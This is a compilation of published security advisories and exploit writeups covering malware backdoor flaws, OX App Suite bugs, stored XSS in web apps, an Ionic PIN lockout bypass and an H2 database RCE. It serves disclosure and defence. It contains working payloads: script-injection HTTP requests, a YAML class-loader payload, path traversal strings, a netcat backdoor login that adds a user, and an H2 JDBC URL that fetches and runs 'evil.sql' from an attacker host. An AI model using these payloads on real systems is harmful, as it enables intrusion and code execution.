<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b83836d7e6b0893e08d88a7850ca84ee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.uq<br />Vulnerability: Insecure Permissions <br />Description: The malware writes a PE file with a ".sys" extension to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: b83836d7e6b0893e08d88a7850ca84ee<br />Vuln ID: MVID-2022-0464<br />Dropped files: MIGBOT.SYS<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />C:\>cacls MIGBOT.SYS<br />C:\MIGBOT.SYS BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir MIGBOT.SYS<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/19/2022 06:27 PM 2,432 MIGBOT.SYS<br /> 1 File(s) 2,432 bytes<br /> 0 Dir(s) 27,604,955,136 bytes free<br /><br /><br />C:\>type MIGBOT.SYS<br />MZÉ @ !This program cannot be run in DOS mode.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Product: OX App Suite, OX Documents<br />Vendor: OX Software GmbH<br /><br /><br />Internal reference: MWB-993<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-03-09<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33489<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Specific image formats use media-types that are were not recognized by our sanitization engine. When injecting HTML and JS code to such files, they could bypass sanitization methods.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Create a XCF image file and include JS code<br />2. Share the file using OX Drive sharing<br />3. Make someone click the direct link to the shared file<br /><br />Solution:<br />We improved the list of known unsafe media-types to make sure such content is handled as binary file and download is enforced.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1067<br />Vulnerability type: Code Injection (CWE-94)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: middleware<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33493<br />CVSS: 3.9 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />The middleware component uses YAML for complex configuration constructs. The parser used for that purpose offers an insecure parsing method, which could be abused to inject arbitrary YAML-formatted Java classes that would be executed.<br /><br />Risk:<br />Arbitrary Java code could be executed in the context of the middleware process. To exploit this, a user with high privilege or a compromised workload would have to maliciously modify configuration files. These modifications are very likely to cause malfunction and keep the service from starting properly.<br /><br />Steps to reproduce:<br />1. Add YAML representation of Java classes to a configuration file<br />2. Reload configuration or restart<br /><br />Proof of concept:<br />!!javax.script.ScriptEngineManager [<br /> !!java.net.URLClassLoader [[<br /> !!java.net.URL ["http://example.open-xchange.com/"]<br /> ]]<br />]<br /><br />Solution:<br />We now use a parsing method that is limited to creating save Java classes which are expected for configuration files.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1094<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13<br />Vendor notification: 2021-05-20<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33490<br />CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />HTML content stored as "snippet" does not get properly sanitized in case invalid HTML is stored.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would either have access to the victims account or be part of the same context.<br /><br />Steps to reproduce:<br />1. Create a snippet with broken HTML code and store it as (shared) mail signature<br />2. Make users to select the malicious mail signature<br /><br />Solution:<br />We improved sanitization of snippets, including invalid HTML code.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: DOCS-3309<br />Vulnerability type: Relative Path Traversal (CWE-23)<br />Vulnerable version: 7.10.5 and earlier<br />Vulnerable component: office<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev15, 7.10.4-rev9, 7.10.5-rev6<br />Vendor notification: 2021-03-23<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33491<br />CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L)<br /><br />Vulnerability Details:<br />External mail account discovery allows malicious users to append arbitrary URL paths to mail addresses. In combination with malicious auto-configuration DNS records, this can be abused to access web services outside of the expected trust boundary, regardless of existing blocklists.<br /><br />Risk:<br />Zip archives (like OOXML and ODF documents) might contain entries with relative pathes, pointing outside of archive root. The extraction process uses the assigned paths and make it is possible to override OX service user writable files (e.g. log files)<br /><br />Steps to reproduce:<br />1. Create a OOXML or ODF file, modify the ZIP archive content table<br />2. Use a relative path that would overwrite or add files to unexpected locations<br />3. Use OX Documents to open such files<br /><br />Proof of concept:<br />../../../../../../../../../../../../../../../../../../../../tmp/foobar<br /><br />Solution:<br />We now prevent the extraction of files with releative paths outside of the expected working directories. A WARN message has been added to the log file whenever this happens.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-770<br />Vulnerability type: Improper Input Validation (CWE-20)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-03-17<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33488<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />The "chat" component contains development related hooks to provide the URL of the chat backend service. This can be used to redirect users to rogue OX Chat servers.<br /><br />Risk:<br />User may disclose sensitive information at a non-trusted system or get harassed with unsolicited content. To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />Steps to reproduce:<br />1. Setup a rogue OX Chat backend or mock service<br />2. Create a hyperlink pointing to that service<br />3. Make users click that link<br /><br />Proof of concept:<br />https://example.com/appsuite/#!!&app=io.ox/chat&chatHost=https://127.0.0.1:8000<br /><br />Solution:<br />We no longer accept user provided input as configuration for client components.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-771<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-03-17<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33492<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Room names in OX Chat can be set to JS code fragments, those are not sufficiently sanitized before adding them to other room participants DOM.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create a chat room with JS code as title<br />2. Invite other users<br /><br />Solution:<br />We improved sanitization of room titles since they are user-provided information.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-809<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.4 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.3-rev30, 7.10.4-rev26<br />Vendor notification: 2021-04-16<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: To be assigned by the vulnerable component<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />OX App Suite uses the "blankshield" component to protect older browsers against "tabnabbing" attacks. A vulnerability was detected at this component, which could be used to run cross-site scripting attacks by injecting malicious hyperlinks to E-Mail and other content.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. The issue is related to browsers which are no longer supported by OX App Suite 7.10.5 or newer.<br /><br />Steps to reproduce:<br />1. Create a E-Mail with a hyperlink that contains malicious JS code<br />2. Send that E-Mail to the victim and make it follow the link<br /><br />Solution:<br />We provided a workaround for this issue to our code and to the upstream component.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-837<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33494<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />A OX Chat method did not properly escape the room title when rendering the "typing" status and adding it to DOM.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create a OX Chat room with malicious code as title<br />2. Make users join and interact with this channel<br /><br />Solution:<br />We now escape user input, like the room title, when injecting it to DOM.<br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-838<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.5<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev12<br />Vendor notification: 2021-05-06<br />Solution date: 2021-06-01<br />Public disclosure: 2021-11-18<br />CVE reference: CVE-2021-33495<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />A OX Chat method did not properly escape content of "system messages" when adding it to DOM.<br /><br />Risk:<br />Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim.<br /><br />Steps to reproduce:<br />1. Create a system message in OX Chat that includes HTML/JS code<br />2. Make users join and interact with OX Chat<br /><br />Solution:<br />We escape any chat messages, including system messages, when injecting it to DOM.<br /><br /></code></pre>
<pre><code># Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)<br /># Date: 19/01/2022<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># Description: Stored XSS in multiple fields...<br /><br /># Steps to reproduce (with employee Access)<br /><br /># Log in as an employee<br /># Go to : http://localhost/ptms/?page=user<br /># Add XSS payload to any field of the user's name.<br />#Click Update<br /><br /><br />=================<br />POST /ptms/classes/Users.php?f=save_employee HTTP/1.1<br />Host: localhost<br />Content-Length: 1339<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) <br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Origin: http://localhost<br />Referer: http://localhost/ptms/?page=user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="id"<br /><br />4<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="code"<br /><br />2022-0003<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="generated_password"<br /><br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="firstname"<br /><br />Mark<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="middlename"<br /><br /><script>alert("XSS_TEST")</script><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="lastname"<br /><br />Cooper<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="department"<br /><br />IT Department<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="position"<br /><br />Department Manager<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="email"<br /><br />mcooper@sample.com<br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="password"<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br />------WebKitFormBoundaryvsLkAfaBC64Uzoak--<br />=================<br /><br />-----------------------------------------------------------------------------<br /><br /># Steps to reproduce (with Admin access)<br /><br /># Log in to the admin panel<br /># Go to : http://localhost/ptms/admin/?page=system_info<br /># Add XSS payload to the 'System Name' field<br />#Click Update<br /><br /><br />=================<br /><br />POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 603<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) <br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Origin: http://localhost<br />Referer: http://localhost/ptms/admin/?page=system_info<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm<br />Connection: close<br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="name"<br /><br />Online Project Time Management System - PHP <script>alert("XSS")</script><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="short_name"<br /><br />PTMS - PHP<br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq<br />Content-Disposition: form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryCibB6pEzThjb4Zcq--<br /><br />=================<br /></code></pre>
<pre><code>#############################################################<br />#<br /># COMPASS SECURITY ADVISORY<br /># https://www.compass-security.com/research/advisories/<br />#<br />#############################################################<br />#<br /># Product: Identity Vault<br /># Vendor: Ionic<br /># CSNC ID: CSNC-2021-020<br /># CVE ID: CVE-2021-44033<br /># Subject: PIN Unlock Lockout Bypass (Android & iOS)<br /># Severity: Medium<br /># Effect: Authentication Bypass<br /># Author: Emanuel Duss <emanuel.duss@compass-security.com><br /># Date: 2021-11-19<br />#<br />#############################################################<br /><br />Introduction<br />------------<br /><br />Ionic Identity Vault is a secure storage solution for Android and iOS mobile<br />apps which can e.g. be used to store authentication information like access<br />tokens [1]. This information can be protected, so that the user must<br />authenticate first, before the information is unlocked.<br /><br />Identity Vault provides different authentication methods:<br /><br />- Memory only storage (not persisted at all)<br />- Secure storage (without user authentication)<br />- Passcode (PIN) authentication<br />- Biometric authentication (optionally with device PIN fallback)<br /><br />The Passcode (PIN) authentication mechanism can be configured with a lockout<br />counter, which will clear the secure storage after a specified number of failed<br />unlocks.<br /><br />During a customer project, we could bypass the PIN unlock lockout mechanism.<br />This allows an attacker with physical access to the device to brute force all<br />possible unlock PIN combinations without being blocked.<br /><br /><br />Affected<br />--------<br /><br />- Vulnerable: Ionic Identity Vault <= 5.0.4<br />- Not vulnerable: Ionic Identity Vault >= 5.0.5<br /><br /><br />Description<br />-----------<br /><br />The failed unlock counter is only stored in memory and can therefore be<br />bypassed. An attacker with physical access to the phone is therefore able to<br />brute force the PIN of the user without being blocked.<br /><br />For example, if the lockout threshold is set to 5, an attacker can perform 4<br />failed unlocks and close the app to clear the failed unlock counter. The app can<br />then be opened again to get 4 more unlock attempts. This can be repeated until<br />the correct PIN was found.<br /><br /><br />Technical Description<br />---------------------<br /><br /># Vulnerability<br /><br />On Android, the logic of the lockout functionality is implemented in the<br />`getData` method of the `com.ionicframework.IdentityVault.VaultBase` class.<br />This method tracks the count of failed authentication attempts and clears the<br />vault after the configured amount of possible failed unlocks is reached:<br /><br /> public void getData() throws VaultError {<br /> try {<br /> if (this.data == null) {<br /> // [...]<br /> }<br /> } catch (AuthFailedError e) {<br /> lock();<br /> int I = this.failedUnlockAttempts + 1;<br /> this.failedUnlockAttempts = I;<br /> if (I ™ this.allowedInvalidUnlockAttempts) {<br /> clear();<br /> this.failedUnlockAttempts = 0;<br /> throw new TooManyFailedAttemptsError();<br /> }<br /> throw e;<br /> } catch (Exception e2) {<br /> throw new VaultError(e2.getLocalizedMessage());<br /> }<br /> }<br /><br />This shows that the failed unlock count `failedUnlockAttempts` is not stored<br />anywhere and only kept in memory.<br /><br />The code on iOS looks similar and therefore the same vulnerability applies to<br />both Android and iOS.<br /><br /><br /># Exploit<br /><br />The following steps can be performed to bypass the number of unlock<br />attempts and get endless tries:<br /><br />- Open the app<br />- Try several PIN unlock attempts until before the last possible attempt which<br /> would clear the secure storage<br />- Close the app (this will clear the `failedUnlockAttempts`)<br />- Start at step 1 again and try the next PINs.<br /><br />All these steps can be automated by using the Android Debug Bridge (adb) [2].<br /><br /><br />Vulnerability Classification<br />----------------------------<br /><br />CVSS v3.1 Metrics [3]:<br /><br />- CVSS Base Score: 5.9 (Medium)<br />- CVSS Vector: AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Workaround / Fix<br />----------------<br /><br /># Ionic Identity Vault Library Vendor<br /><br />A counter of the failed unlock attempts should be stored on the phone. This<br />counter should only be readable by the app itself and not by other apps. It can<br />e.g., be stored in the application directory.<br /><br />Note: An attacker with root access on the phone can always bypass such lockout<br />mechanisms by hooking the functions which perform the check. A lockout counter<br />stored in the application directory still protects against non-root attackers.<br />It's therefore not necessary to specially protect/encrypt the failed unlock<br />counter.<br /><br /><br /># Ionic Identity Vault Library Users<br /><br />Customers of the Ionic Identity Vault should use the updated version Identity<br />Vault 5.0.5 which fixes the issue [4].<br /><br /><br />Timeline<br />--------<br /><br />2021-08-05: Vulnerability discovered<br />2021-09-06: Informed Ionic about the vulnerability<br />2021-09-07: Ionic told they will fix it and inform me when the fix is available<br />2021-10-25: Asked Ionic about the current state<br />2021-10-25: Ionic told it's already fixed.<br />2021-11-18: Requested CVE ID @ MITRE<br />2021-11-19: Assigned CVE-2021-44033<br />2021-11-19: Coordinated public disclosure<br /><br /><br />References<br />----------<br /><br />[1] https://ionic.io/docs/identity-vault<br />[2] https://developer.android.com/studio/command-line/adb<br />[3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N&version=3.1<br />[4] https://ionic.io/docs/identity-vault/changelog --> [5.0.5] (2021-09-30)<br /><br /><br /><br /></code></pre>
<pre><code>Document Title<br />===============<br />Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.<br /><br />Product Description<br />===============<br />The H2 Console Application<br /><br />The Console lets you access a SQL database using a browser interface.<br /><br />Homepage: http://www.h2database.com/html/quickstart.html<br />Affected Components<br />===============<br />File Name: WebServer.java<br />File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java<br />Impacted Function: getConnection<br /><br />PoC<br />===============<br /><br />1) Navigate to the console and attempt to connect to a H2 in memory<br />database that does not exist using the following JDBC URL:<br /><br />```<br />jdbc:h2:mem:1337;<br />```<br /><br />2) Note that you get the following security exception preventing you<br />from creating a new in memory database:<br /><br />```<br />Database "mem:1337" not found, either pre-create it or allow remote<br />database creation (not recommended in secure environments) [90149-209]<br />90149/90149 (Help)<br />```<br /><br />3) Now try again with the following JDBC URL:<br /><br />```<br />jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\<br />```<br /><br />4) Note that you were able to successfully create a new in memory database<br />5) Create a SQL file that contains a trigger that executes<br />java/javascript/ruby code when executed and host it on a domain you<br />control (ex: http://attacker)<br />6) Use the following JDBC URL to execute the SQL file hosted on your<br />domain on connect:<br /><br />```<br />jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT<br />FROM 'http://attacker/evil.sql';'\<br />```<br /><br />Example evil.sql file:<br /><br />```<br />CREATE TABLE test (<br /> id INT NOT NULL<br /> );<br /><br />CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript<br />var fos = Java.type("java.io.FileOutputStream");<br />var b = new fos ("/tmp/pwnedlolol");';<br /><br />INSERT INTO TEST VALUES (1);<br />```<br /><br />CVE Issued: CVE-2022-23221<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/52d1341f73c34ba2638581469120b68a.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.a<br />Vulnerability: Weak Hardcoded Password <br />Description: The malware listens on TCP port 1698 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "23706373" is weak and hardcoded within the executable. The malware is packed with UPX and exposes the cleartext all numeric credentials when decompressed.<br />Type: PE32<br />MD5: 52d1341f73c34ba2638581469120b68a<br />Vuln ID: MVID-2021-0404<br />Dropped files: keygen.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1698<br />Login: 23706373<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#DOS<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS\system32>whoami<br />whoami<br />nt authority\system<br /><br />C:\WINDOWS\system32>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220117-0 ><br />=======================================================================<br /> title: Stored Cross-Site Scripting vulnerability<br /> product: TYPO3 extension "femanager"<br /> vulnerable version: 6.0.0 - 6.3.0 and 5.5.0 and below<br /> fixed version: 6.3.1 and 5.5.1<br /> CVE number: CVE-2021-36787<br /> impact: Medium<br /> homepage: https://www.in2code.de<br /> https://extensions.typo3.org/extension/femanager<br /> found: 2021-06-01<br /> by: Lukas Eder (Atos Germany)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Femanager is an extension for a TYPO3 Frontend-User Registration.<br />Maybe you know sr_feuser_register but you want to use a more modern extension,<br />give femanager a try.<br />This extension basicly brings an easy-to-use frontend-user-registration with a<br />profile manager to your system. In addition femanager was developed to be<br />very flexible and to bring a lot of features out of the box."<br /><br />Source: https://docs.typo3.org/p/in2code/femanager/master/en-us/Introduction/Index.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting (CVE-2021-36787)<br />The default configuration of the upload function within the registration workflow<br />of the femanager to create new frontend users allows an upload of various file types<br />as profile image.<br /><br />An attacker can use the upload function in the registration process to upload<br />SVG files with embedded JavaScript code that is stored on the webserver.<br />Depending on the developed application, the malicious JavaScript code is<br />executed in the context of other users in various scenarios, e.g. when a user<br />visits the profile of the attacker's frontend user.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting (CVE-2021-36787)<br />The vulnerability can be triggered if the extension's image upload function is<br />used.<br /><br />The following proof of concept shows the crafted HTTP Request that was used to<br />create a user with embedded JavaScript code in the SVG file. This SVG file is<br />used as profile image, which leads to execution every time the image is rendered.<br /><br />HTTP Request:<br />-------------------------------------------------------------------------------<br />POST /login/registrieren?tx_femanager_pi1%5Baction%5D=create&tx_femanager_pi1%5Bcontroller%5D=New&cHash=XXX HTTP/1.1<br />Host: <IP><br />Content-Type: multipart/form-data; boundary=---------------------------222617292530868691744105633415<br />Connection: close<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@extension]"<br /><br />Femanager<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@vendor]"<br /><br />In2code<br /><br />[...]<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][username]"<br /><br />XXX<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][password]"<br /><br />XXX<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[password_repeat]"<br /><br />XXX<br /><br />[...]<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][image][0]"; filename="xss_file.svg"<br />Content-Type: image/svg+xml<br /><br /><svg xmlns="http://www.w3.org/2000/svg"><br /> <script>alert("XSS WORKS")</script><br /></svg><br /><br />-----------------------------222617292530868691744105633415<br />-------------------------------------------------------------------------------<br /><br /><br />Tested versions:<br />-----------------------------<br />The following version has been tested:<br />* femanager: 5.4.2 (TYPO3: 9.5.27)<br /><br />The vendor confirmed that the following versions are also affected by the vulnerability:<br />* femanager: 6.0.0 - 6.3.0 and 5.5.0 and below<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-05: Contacting vendor through security@typo3.org.<br />2021-07-06: Received information from vendor that they will work on a solution.<br />2021-08-10: Received info from vendor about a released Typo3 Security Advisory that covers<br /> the vulnerability. The advisory also covers the updated versions of the<br /> extensions that should be used.<br />2022-01-17: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br /><br />Further information can be found at the Typo3 security advisory:<br />https://typo3.org/security/advisory/typo3-ext-sa-2021-010<br /><br /><br />Workaround:<br />-----------<br />The upload of SVG files could be disabled. This can be accomplished by adjusting the<br />configuration file of the femanager extension. If SVG files are necessary for the functions<br />of the website, it must be ensured that malicious code within these files, e.g. in the form<br />of JavaScript, is not executed.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge 